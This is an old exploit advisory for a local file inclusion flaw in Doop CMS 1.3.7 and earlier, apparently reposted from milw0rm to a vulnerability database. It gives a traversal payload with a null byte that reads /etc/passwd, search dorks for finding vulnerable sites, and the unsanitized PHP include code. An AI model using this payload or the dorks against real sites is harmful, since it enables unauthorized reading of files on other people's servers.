doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Doop CMS 1.3.7 page Local File Inclusion Vulnerabilit


                                                 ______________________________________________________
|         DOOP CMS &#60;=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST[&#39;page&#39;])){                     |
|    $_REQUEST[&#39;page&#39;]=$homepage;                      |
|    $cpage=$_REQUEST[&#39;page&#39;];                         |
|  } else { $cpage=$_REQUEST[&#39;page&#39;]; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION[&#39;name&#39;]) || isset($_REQUEST[&#39;preview&#39;])){
|    if (file_exists(&#34;pages/&#34;.$cpage.&#34;.htm&#34;)){         |
|        include(&#34;pages/&#34;.$cpage.&#34;.htm&#34;);              |
|    }                                                 |
|    else include(&#34;pages/&#34;.$cpage.&#34;.html&#34;);            |
|   }                                                  |
|______________________________________________________|
 ______________________________________________________
| greetz to: http://vladii.wordpress.com               |
|            http://rstzone.org                        |
|            http://hackpedia.info                     |
|            SlicK & Shocker & moubik & kw3            |
|______________________________________________________|

 ______________________________________________________
|                  @vladii 2007                        |
|______________________________________________________| 

# milw0rm.com [2007-10-15]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1